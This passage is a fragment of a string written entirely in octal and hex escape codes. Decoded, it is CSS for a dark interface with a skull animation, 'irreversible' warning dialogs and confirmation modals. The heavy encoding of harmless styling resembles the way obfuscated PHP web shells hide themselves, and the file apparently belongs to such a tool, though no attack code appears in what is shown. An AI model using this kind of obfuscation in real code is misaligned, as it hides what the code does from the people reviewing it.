33\x73\40\145\141\163\145\55\151\156\55\x6f\x75\164\x20\151\156\146\x69\x6e\151\x74\x65\x3b\xa\11\11\11\x70\x6f\163\151\164\x69\x6f\x6e\x3a\40\162\x65\154\x61\x74\151\x76\145\73\xa\x9\11\11\x7a\55\151\156\x64\x65\x78\x3a\x20\x31\x3b\12\x9\x9\11\146\151\x6c\164\x65\162\72\x20\x64\x72\x6f\160\x2d\163\150\x61\144\x6f\x77\50\60\x20\x30\x20\61\x35\160\x78\x20\x72\x67\x62\x61\x28\x32\62\x30\54\x20\x35\x33\x2c\x20\66\71\x2c\40\60\56\x38\51\51\73\12\x9\x9\x7d\xa\11\x9\xa\x9\11\x40\x6b\145\171\x66\162\141\x6d\145\x73\x20\163\153\x75\154\x6c\106\154\x6f\141\164\40\x7b\xa\x9\x9\11\x30\45\54\40\61\x30\60\x25\x20\x7b\xa\11\11\11\11\164\162\x61\156\x73\x66\157\162\x6d\72\40\164\x72\141\x6e\x73\x6c\141\x74\x65\131\50\60\51\x20\x72\x6f\x74\x61\164\145\50\x30\144\145\147\x29\x3b\xa\x9\x9\11\175\xa\x9\x9\11\62\x35\45\x20\173\12\x9\x9\x9\x9\x74\x72\141\x6e\163\x66\x6f\162\155\x3a\40\x74\x72\141\156\x73\x6c\141\164\x65\x59\x28\55\x31\x30\160\170\x29\40\x72\x6f\x74\x61\164\x65\50\55\65\144\x65\147\x29\73\xa\11\11\11\175\12\11\x9\11\x37\x35\45\40\173\xa\11\11\x9\11\164\162\x61\x6e\163\x66\157\x72\155\x3a\40\164\162\x61\156\x73\x6c\141\x74\145\131\50\55\x31\x30\x70\x78\51\40\x72\x6f\x74\x61\164\x65\50\x35\x64\145\x67\51\x3b\12\11\11\11\175\xa\11\x9\x7d\12\11\x9\xa\x9\x9\56\x69\x72\162\x65\166\145\162\163\x69\142\154\x65\55\x74\151\x74\154\x65\x20\x7b\xa\11\x9\x9\x66\x6f\x6e\x74\55\163\x69\x7a\145\x3a\40\61\56\x34\x72\145\x6d\73\12\11\11\x9\146\x6f\156\x74\55\x77\x65\151\147\x68\164\x3a\x20\x37\x30\x30\73\12\x9\11\x9\143\x6f\154\x6f\x72\x3a\x20\166\141\162\x28\x2d\x2d\141\x63\143\x65\x6e\164\x2d\x72\x65\x64\51\x3b\xa\11\x9\x9\155\x61\x72\x67\151\x6e\55\142\x6f\164\x74\x6f\155\72\x20\60\56\67\x35\162\145\155\73\12\x9\x9\x9\164\145\x78\x74\55\x74\162\141\x6e\163\146\x6f\x72\155\72\40\165\x70\160\x65\162\143\x61\163\145\x3b\xa\11\11\x9\x6c\145\x74\164\x65\162\x2d\163\x70\x61\143\x69\x6e\x67\72\x20\x31\160\170\73\xa\11\x9\11\164\x65\170\164\55\x73\x68\141\144\x6f\167\x3a\40\60\x20\x30\x20\61\65\160\x78\x20\162\x67\142\x61\50\62\62\60\x2c\40\x35\63\54\40\66\x39\54\x20\x30\56\x38\x29\54\12\x9\x9\x9\x9\11\x9\60\40\62\160\x78\40\x38\x70\170\40\162\x67\x62\x61\x28\60\x2c\x20\60\x2c\40\x30\x2c\40\x30\x2e\65\x29\73\xa\11\11\11\x70\x6f\x73\x69\x74\x69\157\156\x3a\40\162\145\154\141\x74\151\166\x65\73\12\11\x9\x9\172\x2d\x69\x6e\144\145\170\x3a\x20\x31\73\12\11\x9\x9\x61\156\x69\155\x61\x74\x69\x6f\x6e\72\x20\164\x69\x74\x6c\x65\123\150\x61\x6b\145\40\60\56\x35\x73\40\x65\141\163\x65\x2d\x69\x6e\x2d\157\x75\x74\40\151\156\x66\x69\x6e\151\164\145\73\12\11\x9\x7d\12\x9\11\12\x9\11\100\153\x65\x79\146\x72\141\x6d\x65\x73\40\164\151\x74\x6c\x65\123\150\x61\x6b\x65\x20\173\12\x9\11\x9\x30\45\54\x20\61\x30\60\45\x20\173\xa\x9\11\x9\11\164\x72\x61\156\x73\x66\x6f\x72\155\72\40\164\x72\x61\x6e\x73\154\x61\x74\x65\130\50\60\x29\x3b\12\x9\x9\11\175\xa\11\11\11\62\x35\x25\x20\173\12\11\11\11\11\164\x72\141\156\x73\146\157\x72\x6d\72\x20\x74\162\x61\156\x73\x6c\141\164\x65\x58\x28\x2d\62\x70\170\51\73\12\11\11\x9\x7d\12\x9\x9\11\67\x35\45\x20\x7b\12\x9\x9\x9\11\164\x72\141\x6e\163\146\157\162\155\72\40\x74\x72\x61\x6e\x73\x6c\x61\164\x65\130\x28\62\160\x78\51\73\xa\x9\x9\11\175\xa\x9\11\x7d\12\11\x9\xa\11\11\56\x69\x72\x72\145\x76\145\x72\163\x69\x62\154\x65\55\155\145\163\163\141\x67\145\x20\x7b\xa\11\11\x9\x66\157\x6e\x74\55\x73\151\172\x65\72\x20\x30\56\71\65\162\145\155\x3b\xa\11\11\11\143\157\x6c\157\162\x3a\40\x76\x61\162\50\55\x2d\164\145\170\x74\x2d\154\151\x67\150\x74\x29\73\12\11\11\x9\x6d\x61\162\x67\x69\x6e\x2d\142\x6f\x74\x74\157\x6d\72\x20\61\56\x32\x35\162\145\155\x3b\12\x9\11\11\154\151\x6e\145\x2d\x68\x65\151\x67\150\x74\x3a\40\x31\56\x35\x3b\12\11\11\11\x70\x6f\163\151\x74\151\x6f\156\72\40\x72\145\154\141\x74\151\x76\x65\x3b\12\x9\x9\x9\x7a\55\x69\x6e\144\145\x78\x3a\x20\61\73\12\x9\x9\x9\146\x6f\x6e\164\55\167\x65\x69\147\150\x74\72\40\65\60\60\x3b\xa\x9\x9\x7d\12\11\11\xa\11\11\56\151\x72\x72\145\x76\145\162\163\151\x62\154\145\55\144\145\164\141\151\x6c\163\x20\x7b\12\11\11\x9\x64\x69\163\x70\154\141\x79\x3a\x20\x66\154\x65\170\x3b\12\x9\x9\11\x66\154\x65\x78\55\144\x69\x72\145\x63\164\x69\157\156\72\x20\x63\157\154\x75\x6d\x6e\x3b\12\11\11\x9\x67\x61\160\72\40\60\56\x37\x35\x72\145\x6d\73\12\x9\x9\x9\x6d\141\162\x67\151\x6e\x2d\x74\x6f\x70\72\40\61\x2e\x32\65\162\x65\x6d\73\xa\x9\x9\11\x70\x6f\x73\x69\164\x69\x6f\x6e\x3a\x20\x72\x65\x6c\141\164\151\x76\145\73\12\x9\x9\11\172\x2d\151\x6e\144\x65\x78\72\x20\61\73\xa\x9\x9\x7d\xa\11\11\xa\x9\11\56\x69\x72\162\x65\166\x65\162\x73\x69\142\154\x65\55\144\145\164\141\x69\154\x2d\151\164\x65\x6d\x20\173\12\11\11\11\144\151\163\160\154\141\171\72\40\146\154\x65\x78\x3b\12\11\x9\11\x61\x6c\151\147\x6e\55\151\164\x65\155\x73\x3a\40\143\x65\x6e\164\x65\x72\x3b\12\x9\11\11\x67\x61\160\72\x20\60\x2e\67\x35\162\x65\x6d\73\12\11\11\x9\142\141\143\x6b\147\x72\x6f\165\156\x64\x3a\40\x72\x67\x62\141\x28\60\54\x20\60\x2c\40\60\54\x20\60\x2e\63\51\x3b\xa\11\11\11\160\141\144\144\151\x6e\147\x3a\40\60\x2e\67\65\162\145\155\x3b\12\11\11\x9\x62\x6f\x72\x64\145\162\x2d\x72\141\x64\151\x75\163\x3a\40\x36\x70\x78\73\xa\x9\x9\x9\142\157\x72\x64\145\x72\55\x6c\145\x66\164\72\x20\x33\x70\x78\40\163\157\x6c\x69\x64\40\166\141\162\x28\x2d\55\141\143\143\x65\156\164\55\x72\145\x64\51\73\12\x9\x9\x9\164\x72\x61\156\x73\x69\164\x69\157\156\x3a\40\141\154\x6c\40\60\x2e\x33\x73\73\xa\11\11\175\xa\11\x9\12\11\11\x2e\151\x72\x72\x65\166\145\x72\163\151\142\154\x65\x2d\x64\x65\164\x61\x69\x6c\55\x69\164\x65\155\72\150\157\x76\x65\162\40\x7b\12\x9\11\11\142\x61\143\x6b\147\x72\157\165\156\144\x3a\x20\162\147\x62\141\x28\62\x32\x30\x2c\40\x35\63\54\40\66\x39\54\40\60\56\x31\x29\73\xa\11\x9\11\x74\162\x61\156\163\x66\x6f\x72\155\x3a\40\x74\162\141\x6e\x73\x6c\x61\x74\x65\x58\x28\65\160\x78\51\73\xa\11\x9\x9\x62\x6f\x72\x64\x65\x72\x2d\x6c\145\x66\164\x2d\167\x69\x64\164\x68\72\40\x36\x70\x78\x3b\xa\11\x9\x7d\12\x9\11\12\x9\11\56\x64\145\164\x61\151\154\55\151\143\157\156\40\173\12\11\x9\11\146\157\x6e\164\x2d\x73\x69\x7a\145\72\40\61\56\62\x72\x65\155\x3b\xa\11\11\11\x66\151\x6c\x74\145\162\72\x20\144\162\157\160\x2d\163\x68\141\144\157\167\x28\x30\40\60\x20\64\x70\170\40\162\x67\x62\141\x28\62\x32\x30\x2c\x20\x35\63\54\x20\66\71\x2c\x20\x30\x2e\66\x29\x29\73\xa\11\11\175\xa\11\11\xa\x9\11\x2e\144\145\164\141\x69\x6c\x2d\x74\x65\170\164\x20\x7b\xa\x9\x9\x9\x63\x6f\x6c\x6f\x72\x3a\x20\166\141\162\x28\55\55\164\x65\x78\164\55\x6c\x69\147\x68\164\x29\73\12\x9\x9\x9\146\157\156\x74\x2d\163\151\172\x65\72\40\x30\56\70\65\x72\145\x6d\x3b\12\11\11\11\146\157\156\x74\x2d\167\x65\x69\x67\150\x74\72\x20\65\60\60\73\xa\x9\x9\11\146\154\x65\170\72\40\x31\x3b\12\11\11\175\12\11\11\xa\x9\11\x2e\x69\x72\x72\x65\166\145\x72\163\151\x62\x6c\145\x2d\x6d\157\144\141\154\55\x61\143\x74\x69\x6f\x6e\163\40\173\xa\x9\11\x9\144\151\x73\160\154\x61\x79\72\x20\x66\x6c\145\170\x3b\xa\11\x9\11\147\141\160\72\x20\61\x72\145\x6d\73\12\11\x9\11\152\165\163\164\151\146\x79\55\x63\x6f\x6e\164\145\x6e\x74\72\40\143\145\x6e\164\145\162\x3b\xa\x9\x9\11\x6d\x61\162\x67\151\156\55\164\x6f\160\x3a\40\61\x2e\65\x72\x65\x6d\73\xa\x9\x9\11\160\x6f\163\x69\164\x69\x6f\x6e\72\x20\162\145\154\x61\164\151\x76\x65\x3b\12\x9\x9\x9\172\x2d\x69\156\x64\x65\170\x3a\x20\61\x3b\12\x9\x9\x7d\12\11\11\xa\x9\11\x2e\151\162\162\x65\166\145\162\163\151\142\154\145\55\142\164\156\x2d\x63\x61\156\x63\x65\154\x2c\xa\x9\11\x2e\x69\162\162\x65\x76\145\162\x73\151\142\154\x65\55\142\164\x6e\55\x63\x6f\x6e\x66\x69\162\x6d\40\173\xa\x9\11\11\x70\x61\x64\144\x69\156\147\72\x20\60\56\x37\65\162\145\x6d\x20\x31\56\x35\162\x65\x6d\x3b\12\x9\x9\x9\x62\157\162\144\x65\x72\72\x20\x6e\157\156\145\x3b\12\11\11\x9\142\x6f\x72\144\145\x72\x2d\162\141\144\151\165\163\x3a\40\66\160\x78\73\12\11\x9\11\x66\157\156\x74\55\163\x69\x7a\145\x3a\40\x30\56\71\x72\145\x6d\x3b\12\x9\x9\11\146\x6f\x6e\164\x2d\x77\145\x69\147\150\164\72\40\x37\60\60\73\xa\x9\11\11\x63\x75\x72\163\x6f\x72\72\x20\160\x6f\151\x6e\164\145\162\73\xa\x9\x9\x9\x74\162\x61\x6e\x73\151\164\151\x6f\x6e\x3a\x20\x61\154\x6c\x20\x30\x2e\x33\163\x20\x63\165\x62\x69\x63\x2d\x62\x65\172\151\145\162\x28\60\x2e\64\54\40\60\x2c\40\60\x2e\62\54\x20\x31\x29\x3b\xa\x9\11\x9\x66\157\x6e\x74\55\146\x61\155\x69\x6c\x79\x3a\40\x76\141\x72\x28\55\55\x66\x6f\156\x74\x2d\146\141\155\151\x6c\171\51\73\xa\11\x9\11\x74\x65\x78\x74\x2d\x74\x72\141\x6e\163\146\157\162\155\72\x20\165\x70\160\145\162\143\x61\163\x65\73\12\11\x9\11\154\x65\164\x74\145\x72\55\163\160\141\143\x69\156\147\72\x20\x30\x2e\65\x70\x78\x3b\12\x9\x9\x9\160\x6f\163\x69\164\x69\157\x6e\72\x20\x72\145\x6c\141\x74\151\x76\x65\x3b\12\x9\11\x9\157\166\145\x72\146\x6c\157\x77\x3a\x20\150\x69\144\x64\145\x6e\x3b\xa\11\x9\x7d\xa\x9\x9\xa\11\x9\x2f\x2a\40\103\157\x6e\x66\x69\162\155\x61\164\x69\157\x6e\x20\x4d\157\x64\141\x6c\x20\123\x74\x79\154\151\x6e\x67\x20\52\57\12\11\x9\56\x63\157\156\x66\151\x72\155\55\x6d\x6f\x64\141\x6c\55\143\157\156\164\x65\156\x74\x20\173\xa\11\x9\11\167\151\x64\164\150\72\40\71\60\45\x3b\12\x9\11\x9\x6d\141\x78\55\167\151\144\164\x68\72\x20\65\x30\x30\160\170\x3b\12\11\11\x9\160\141\144\144\151\x6e\x67\x3a\x20\60\73\12\11\11\11\x62\157\x72\144\145\x72\x3a\40\62\x70\170\40\163\157\154\x69\x64\x20\x76\141\162\x28\55\x2d\141\x63\x63\x65\156\164\55\x62\154\x75\145\x29\73\xa\x9\11\x9\x62\141\x63\x6b\147\162\x6f\165\156\x64\x3a\x20\154\151\156\x65\x61\162\x2d\147\162\141\144\151\x65\156\x74\x28\x31\63\x35\144\x65\147\54\x20\x76\141\x72\x28\x2d\x2d\x62\147\55\x6d\145\144\51\40\x30\x25\x2c\x20\x76\x61\x72\x28\x2d\x2d\x62\x67\x2d\154\x69\x67\x68\164\51\x20\x31\60\x30\x25\x29\73\12\11\11\x9\x62\x6f\x78\55\x73\150\141\x64\157\167\72\40\60\x20\61\65\160\x78\x20\64\60\160\x78\40\x72\147\x62\141\x28\x30\x2c\x20\x30\x2c\x20\x30\54\x20\x30\x2e\65\51\x3b\12\11\11\x9\x6f\166\x65\x72\x66\154\x6f\x77\72\40\x68\151\x64\144\x65\156\73\xa\11\11\x9\x61\x6e\x69\x6d\141\x74\151\x6f\156\72\x20\x6d\x6f\x64\141\154\123\x6c\x69\x64\x65\x49\x6e\x20\x30\56\x33\x73\40\x63\165\x62\151\143\x2d\x62\145\172\x69\x65\x72\50\x30\56\x34\x2c\x20\60\54\x20\60\x2e\x32\54\x20\61\51\73\xa\11\11\x7d\xa\11\11\xa\11\11\56\x63\x6f\156\x66\x69\162\155\55\x6d\157\x64\x61\154\x2d\x68\145\x61\x64\145\162\40\x7b\12\11\x9\x9\x62\141\143\x6b\x67\162\157\165\x6e\144\x3a\40\x6c\x69\x6e\x65\x61\162\55\147\162\x61\x64\x69\x65\x6e\164\50\x31\x33\65\x64\145\x67\54\x20\x76\141\x72\x28\55\x2d\141\x63\x63\145\x6e\x74\x2d\x62\x6c\165\145\51\x20\x30\45\x2c\40\43\71\x64\x63\x31\x66\x66\x20\x31\x30\x30\45\x29\x3b\xa\x9\11\11\160\x61\x64\x64\x69\x6e\x67\x3a\x20\x31\x2e\x35\162\x65\x6d\73\xa\11\x9\11\x74\x65\x78\164\x2d\141\154\x69\147\156\x3a\40\143\145\x6e\164\x65\162\73\12\x9\11\11\142\157\x72\144\x65\162\x2d\142\x6f\x74\x74\x6f\x6d\x3a\x20\x32\x70\170\40\x73\x6f\x6c\151\144\x20\166\x61\x72\x28\x2d\x2d\x61\x63\143\x65\x6e\x74\x2d\x62\x6c\x75\x65\x29\73\12\11\11\175\12\11\x9\xa\11\11\56\x63\157\x6e\x66\151\x72\x6d\55\x6d\x6f\144\x61\x6c\x2d\150\x65\141\x64\145\162\40\x68\x33\40\x7b\xa\11\11\11\155\x61\x72\x67\151\156\72\x20\60\x3b\xa\x9\x9\x9\x66\157\156\164\55\x73\151\172\x65\72\40\x31\56\63\162\x65\155\73\xa\11\x9\x9\143\x6f\154\157\x72\x3a\40\166\x61\x72\50\x2d\x2d\142\147\x2d\144\x61\162\153\x29\73\12\11\11\11\x66\157\156\x74\x2d\167\x65\151\x67\x68\164\x3a\40\x37\60\60\73\12\11\11\11\x64\x69\163\x70\x6c\141\x79\72\x20\x66\x6c\145\x78\73\12\11\11\11\x61\x6c\x69\x67\156\x2d\151\164\145\155\163\72\40\143\x65\x6e\164\145\x72\x3b\xa\11\11\x9\x6a\165\163\164\x69\x66\171\55\143\157\156\x74\x65\x6e\x74\x3a\40\143\x65\x6e\164\145\162\73\xa\11\11\x9\147\x61\x70\x3a\40\x30\56\x35\x72\x65\x6d\x3b\12\11\x9\175\xa\11\x9\xa\11\11\x2e\x63\157\x6e\x66\151\162\155\55\x6d\157\144\x61\154\x2d\150\x65\141\144\145\x72\x20\x2e\143\x6c\x6f\x73\x65\x20\173\xa\x9\x9\11\x63\x6f\154\157\162\72\x20\166\141\x72\x28\x2d\x2d\142\147\x2d\144\x61\162\153\51\x3b\12\11\x9\11\146\157\156\164\55\x73\x69\x7a\x65\x3a\40\x31\x2e\x38\162\145\155\x3b\xa\11\x9\x9\157\x70\141\x63\x69\164\171\72\x20\x30\x2e\x38\x3b\12\x9\x9\11\164\x72\x61\x6e\x73\x69\x74\x69\157\x6e\x3a\x20\141\154\x6c\x20\x30\56\x33\163\x20\145\141\163\x65\x3b\xa\x9\11\x7d\xa\x9\x9\xa\11\x9\x2e\x63\x6f\x6e\x66\151\162\155\55\155\x6f\x64\141\x6c\x2d\150\145\x61\144\x65\162\x20\56\143\154\x6f\163\145\72\x68\x6f\x76\x65\162\x20\173\12\x9\x9\11\157\x70\141\x63\x69\x74\x79\x3a\x20\61\x3b\xa\11\x9\11\143\x6f\154\x6f\162\72\x20\166\x61\x72\x28\x2d\x2d\141\143\143\x65\156\164\x2d\162\x65\144\x29\x3b\xa\11\x9\x9\164\x72\141\156\x73\x66\157\162\155\72\x20\x72\157\164\x61\x74\x65\50\71\60\x64\x65\x67\51\x3b\12\11\x9\x7d\xa\11\x9\12\11\11\x2e\x63\x6f\x6e\146\x69\x72\155\55\155\x6f\x64\x61\x6c\55\142\x6f\144\x79\40\173\12\x9\11\11\x70\x61\x64\144\151\x6e\147\x3a\x20\x32\x72\145\155\x3b\12\11\11\11\164\145\170\x74\x2d\x61\x6c\x69\x67\x6e\x3a\x20\143\x65\156\x74\x65\162\73\xa\11\x9\175\12\x9\x9\xa\11\x9\56\143\157\x6e\x66\151\x72\x6d\55\151\x63\157\x6e\40\x7b\12\11\11\11\x66\157\156\164\x2d\163\151\x7a\x65\72\x20\64\162\x65\155\x3b\12\x9\11\x9\155\141\162\147\x69\x6e\55\142\x6f\164\x74\157\x6d\x3a\40\61\x72\145\x6d\73\xa\x9\11\11\141\x6e\151\x6d\141\164\151\157\156\x3a\40\160\165\x6c\163\x65\x20\62\x73\40\145\x61\163\x65\x2d\151\156\x2d\x6f\x75\164\40\x69\x6e\x66\x69\156\151\x74\145\73\12\x9\11\175\xa\x9\x9\xa\x9\x9\x40\x6b\145\171\146\x72\141\x6d\145\x73\x20\x70\165\x6c\163\x65\x20\173\12\x9\x9\11\x30\45\54\x20\61\60\x30\45\40\x7b\40\164\x72\141\x6e\x73\x66\157\162\155\x3a\x20\x73\143\x61\154\x65\x28\61\x29\73\40\x7d\12\11\x9\11\65\x30\x25\x20\x7b\40\164\162\x61\x6e\163\146\157\x72\x6d\72\x20\163\x63\x61\x6c\x65\50\61\56\61\x29\x3b\x20\x7d\12\x9\x9\175\xa\x9\11\12\11\x9\x2e\143\157\156\146\x69\x72\155\x2d\155\145\x73\x73\141\x67\145\40\x7b\xa\11\11\x9\143\x6f\x6c\157\162\72\40\x76\141\x72\50\x2d\x2d\x74\145\170\164\55\154\151\147\150\164\x29\x3b\12\11\x9\11\146\x6f\x6e\164\55\163\151\x7a\145\x3a\40\x31\x2e\x31\162\145\155\73\12\11\11\11\x6c\151\156\x65\x2d\150\x65\x69\x67\x68\x74\72\x20\61\x2e\x36\73\xa\x9\11\11\x6d\141\x72\147\x69\x6e\x3a\x20\60\x20\60\40\x31\x2e\x35\162\x65\x6d\40\60\x3b\xa\x9\x9\x9\167\157\162\x64\55\x77\x72\x61\x70\72\x20\142\x72\145\x61\x6b\55\x77\157\162\x64\x3b\12\x9\11\175\xa\11\x9\12\x9\x9\56\x63\157\x6e\146\x69\162\155\55\155\145\163\163\141\x67\145\40\163\x74\x72\157\156\147\40\x7b\12\11\x9\11\143\157\x6c\x6f\162\72\40\166\141\x72\x28\55\x2d\x61\143\x63\145\156\164\55\147\157\154\144\x29\x3b\12\11\11\11\x66\x6f\x6e\x74\x2d\x77\x65\x69\147\x68\x74\x3a\40\x36\x30\60\73\xa\11\11\x7d\xa\x9\11\12\x9\x9\x2e\x63\x6f\156\x66\x69\162\x6d\x2d\155\x6f\144\141\x6c\x2d\x61\x63\x74\151\x6f\x6e\x73\40\x7b\12\11\11\11\144\151\163\x70\x6c\141\x79\x3a\x20\x66\154\x65\170\73\xa\x9\11\x9\147\x61\160\x3a\40\61\x72\x65\155\73\12\11\x9\11\x6a\165\x73\164\151\146\x79\55\143\x6f\156\x74\x65\156\x74\72\x20\143\x65\156\x74\145\x72\73\xa\x9\x9\x9\155\141\162\x67\151\x6e\x2d\x74\x6f\160\72\x20\61\x2e\x35\162\x65\155\x3b\xa\x9\11\x7d\12\x9\11\12\x9\11\x2e\143\x6f\156\x66\151\x72\x6d\x2d\x62\x74\156\55\143\141\156\143\x65\154\x2c\12\x9\11\56\143\x6f\x6e\146\x69\x72\155\x2d\x62\164\156\55\157\x6b\40\x7b\xa\x9\11\11\x70\141\x64\x64\151\x6e\x67\x3a\x20\x30\x2e\70\x35\x72\x65\155\40\62\162\145\155\x3b\xa\11\11\x9\x62\157\x72\x64\145\162\72\40\x6e\x6f\x6e\x65\x3b\12\x9\x9\x9\x62\x6f\162\144\x65\x72\x2d\162\x61\144\151\x75\163\x3a\x20\x38\160\170\73\xa\x9\x9\11\x66\x6f\x6e\164\x2d\x73\x69\x7a\145\72\x20\61\162\x65\155\x3b\12\11\11\11\146\x6f\x6e\x74\x2d\167\145\x69\147\150\x74\x3a\x20\66\x30\60\73\xa\x9\x9\x9\x63\165\x72\x73\157\x72\x3a\x20\160\x6f\151\156\x74\145\x72\x3b\xa\11\x9\x9\164\x72\141\156\x73\x69\x74\151\x6f\156\x3a\x20\141\154\154\x20\60\x2e\x33\x73\x20\143\x75\142\x69\x63\55\142\x65\x7a\151\145\162\x28\60\x2e\64\54\x20\x30\54\x20\60\x2e\x32\x2c\40\61\x29\x3b\xa\11\11\11\146\x6f\x6e\x74\x2d\146\141\155\151\154\x79\72\x20\x76\x61\162\50\x2d\55\146\157\156\164\55\146\x61\155\x69\x6c\171\51\x3b\xa\11\11\x9\x6d\x69\156\55\167\x69\x64\x74\150\72\x20\x31\x32\60\160\x78\73\xa\11\11\11\x70\157\163\x69\164\151\157\156\72\40\x72\x65\154\141\164\151\x76\x65\x3b\12\x9\x9\x9\x6f\166\145\162\x66\154\157\167\72\40\150\x69\x64\144\145\156\73\xa\11\11\x7d\xa\x9\x9\12\11\11\x2e\x63\157\x6e\x66\151\x72\x6d\x2d\x62\x74\156\x2d\143\x61\x6e\143\x65\154\x20\173\12\11\x9\11\x62\x61\143\x6b\x67\x72\x6f\x75\x6e\144\72\40\x6c\151\x6e\x65\x61\162\x2d\x67\162\141\x64\x69\145\156\164\x28\x31\63\65\x64\x65\x67\x2c\40\166\x61\162\50\55\55\x62\x67\55\154\x69\147\150\x74\51\40\x30\45\x2c\x20\x76\x61\x72\x28\x2d\x2d\142\x67\x2d\x6d\x65\x64\x29\40\61\x30\60\45\x29\x3b\12\x9\11\x9\x63\x6f\154\x6f\x72\72\x20\x76\x61\162\x28\x2d\55\x74\x65\170\x74\55\x6c\151\x67\x68\x74\x29\x3b\xa\x9\11\11\x62\157\x72\144\145\162\72\40\62\160\x78\x20\163\x6f\x6c\151\x64\40\166\141\162\x28\x2d\x2d\x62\157\x72\144\145\x72\x2d\143\157\154\x6f\162\51\73\xa\x9\x9\x9\x62\157\x78\55\163\x68\x61\144\157\x77\72\x20\60\x20\x34\160\x78\40\61\x35\x70\x78\40\x72\147\x62\x61\x28\x30\54\40\60\x2c\40\60\54\40\x30\x2e\x32\x29\73\12\11\11\x7d\12\x9\11\12\x9\x9\56\143\x6f\x6e\x66\151\162\x6d\x2d\x62\164\156\x2d\143\141\x6e\143\145\154\72\x68\x6f\x76\145\162\40\x7b\xa\11\x9\11\x62\x61\143\153\x67\162\157\x75\x6e\x64\72\40\166\x61\162\x28\x2d\x2d\142\x67\55\144\141\x72\x6b\51\x3b\12\x9\11\11\x62\157\x72\144\x65\162\55\x63\157\x6c\157\x72\x3a\40\x76\141\162\50\55\x2d\x74\145\170\x74\55\155\145\x64\x29\x3b\12\11\x9\x9\164\x72\141\156\163\x66\157\x72\x6d\x3a\x20\x74\x72\141\x6e\x73\154\141\x74\145\x59\50\x2d\62\x70\170\51\73\xa\11\x9\11\x62\x6f\x78\55\163\150\x61\x64\x6f\x77\x3a\40\x30\40\x36\160\x78\x20\x32\60\x70\170\40\x72\x67\142\141\50\60\54\40\60\x2c\40\x30\54\40\60\x2e\x33\51\73\xa\11\x9\x7d\xa\x9\x9\xa\x9\11\56\x63\x6f\x6e\146\x69\162\x6d\x2d\x62\164\x6e\55\143\141\x6e\143\x65\154\x3a\141\143\x74\x69\166\145\40\173\xa\x9\x9\11\164\x72\x61\156\x73\x66\x6f\x72\x6d\72\40\164\162\141\x6e\x73\154\141\x74\145\x59\50\60\x29\73\12\11\x9\x7d\12\11\11\xa\11\11\x2e\x63\157\x6e\146\x69\162\x6d\55\x62\x74\x6e\55\157\153\x20\173\12\11\11\x9\x62\141\x63\153\147\x72\157\165\156\144\72\40\154\x69\156\x65\141\162\x2d\x67\162\141\144\151\x65\x6e\x74\50\61\x33\65\x64\145\147\54\40\x76\x61\x72\50\55\55\141\x63\143\145\156\164\x2d\x62\x6c\x75\145\51\x20\x30\x25\54\x20\43\71\x64\143\61\x66\146\x20\61\x30\60\45\x29\x3b\xa\11\11\x9\143\157\x6c\157\162\72\40\x76\141\x72\x28\x2d\55\x62\x67\x2d\144\141\x72\153\x29\x3b\12\11\x9\11\x62\x6f\x78\x2d\x73\150\x61\144\x6f\167\72\40\60\x20\x34\160\170\40\x31\65\160\x78\x20\162\147\x62\141\x28\61\63\60\54\x20\61\67\x30\x2c\40\62\65\65\54\x20\60\56\x34\51\x3b\xa\11\11\x7d\12\11\11\xa\11\11\56\143\x6f\156\x66\151\162\155\55\142\164\156\x2d\x6f\153\x3a\x68\157\166\x65\x72\x20\173\xa\11\11\11\x74\x72\141\x6e\163\146\x6f\162\155\x3a\40\164\x72\141\156\163\x6c\x61\164\x65\x59\50\55\x32\x70\x78\x29\73\12\11\x9\x9\x62\x6f\x78\x2d\163\150\x61\x64\157\x77\x3a\x20\60\x20\66\x70\170\x20\x32\x30\160\x78\40\x72\x67\x62\141\50\61\x33\x30\x2c\x20\x31\67\60\x2c\40\62\x35\x35\54\x20\x30\56\66\x29\73\12\x9\x9\175\12\x9\x9\12\x9\x9\x2e\143\x6f\x6e\x66\x69\162\x6d\x2d\142\x74\x6e\55\x6f\x6b\x3a\x61\x63\x74\x69\x76\x65\x20\x7b\xa\11\x9\x9\x74\162\141\x6e\x73\146\157\162\x6d\72\40\164\162\x61\x6e\163\x6c\141\164\145\x59\50\x30\x29\73\12\x9\x9\175\xa\x9\11\xa\11\11\56\x63\x6f\x6e\x66\151\x72\x6d\55\142\164\156\55\144\x61\156\x67\145\x72\x20\173\12\x9\11\11\142\141\143\153\x67\x72\x6f\x75\156\x64\72\40\154\x69\156\145\x61\162\x2d\147\162\x61\144\x69\x65\x6e\164\x28\x31\x33\x35\144\x65\x67\x2c\x20\x76\x61\162\50\55\x2d\x61\x63\143\x65\x6e\164\x2d\x72\145\x64\51\40\60\45\54\x20\x23\x66\x66\x36\142\x36\x62\x20\61\60\x30\x25\51\x3b\12\11\x9\x9\x63\x6f\154\x6f\x72\72\40\167\x68\151\x74\145\73\12\x9\11\11\x62\157\x78\x2d\163\x68\x61\144\x6f\167\72\40\60\x20\64\x70\170\x20\61\65\x70\170\40\162\x67\142\141\x28\x32\x35\x35\x2c\40\67\x37\54\40\67\x37\54\x20\60\56\64\51\73\xa\11\11\175\12\x9\x9\12\11\11\x2e\143\157\156\146\x69\162\x6d\55\x62\x74\x6e\x2d\x64\x61\x6e\147\145\162\x3a\x68\x6f\x76\145\x72\40\173\xa\11\x9\x9\164\162\x61\x6e\x73\146\x6f\162\155\x3a\x20\164\x72\x61\156\x73\x6c\x61\x74\145\131\50\55\62\x70\170\51\x3b\12\x9\11\11\142\x6f\x78\55\x73\150\x61\144\x6f\x77\72\x20\60\x20\x36\x70\x78\x20\62\x30\x70\x78\x20\x72\x67\142\141\x28\62\x35\x35\x2c\40\67\67\54\40\x37\x37\54\40\60\x2e\66\x29\x3b\12\x9\11\175\12\11\x9\12\11\11\x2f\x2a\x20\x49\156\x70\165\x74\x20\x4d\x6f\144\141\154\40\x53\x74\x79\x6c\151\x6e\147\40\x2a\x2f\12\11\x9\56\x69\x6e\x70\x75\164\55\x6d\x6f\144\x61\x6c\x2d\x63\157\x6e\x74\145\156\164\x20\173\12\11\11\11\167\151\x64\x74\x68\x3a\40\71\x30\x25\x3b\xa\x9\x9\x9\155\141\170\x2d\167\x69\x64\x74\x68\72\40\65\60\60\160\170\x3b\12\x9\x9\x9\x70\141\144\144\x69\156\147\x3a\x20\60\73\12\x9\11\x9\142\157\x72\144\x65\162\72\40\62\160\x78\40\163\157\x6c\151\x64\40\166\141\162\50\x2d\x2d\141\x63\143\x65\x6e\164\x2d\x62\154\x75\145\51\x3b\12\11\x9\11\x62\141\143\x6b\147\x72\x6f\x75\156\144\72\40\x6c\151\156\145\141\162\x2d\x67\x72\x61\144\151\145\x6e\164\x28\x31\x33\x35\144\x65\147\x2c\40\16